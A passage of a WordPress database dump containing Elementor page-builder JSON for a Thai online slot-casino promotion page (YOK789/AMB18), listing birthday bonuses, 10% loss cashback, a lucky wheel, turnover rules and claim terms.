data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Bonus-Banner-Yok789.webp\",\"id\":275,\"size\":\"\",\"alt\":\"HBD Bonus\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-Yok789.webp\",\"id\":277,\"size\":\"\",\"alt\":\"Reward 10\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/lucky-wheel-Banner-Yok789.webp\",\"id\":276,\"size\":\"\",\"alt\":\"lucky wheel \",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 <b>YOK789<\\/b><\\/strong>\\u00a0\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\"><strong data-start=\\\"2414\\\" data-end=\\\"2445\\\"><b>YOK789<\\/b> \\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3048,404,'_thumbnail_id','347'),(3052,405,'_elementor_edit_mode','builder'),(3053,405,'_elementor_template_type','wp-page'),(3054,405,'_elementor_version','3.35.5'),(3055,405,'_elementor_pro_version','3.32.3'),(3056,405,'_wp_page_template','default'),(3057,405,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3058,405,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 AMB18 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 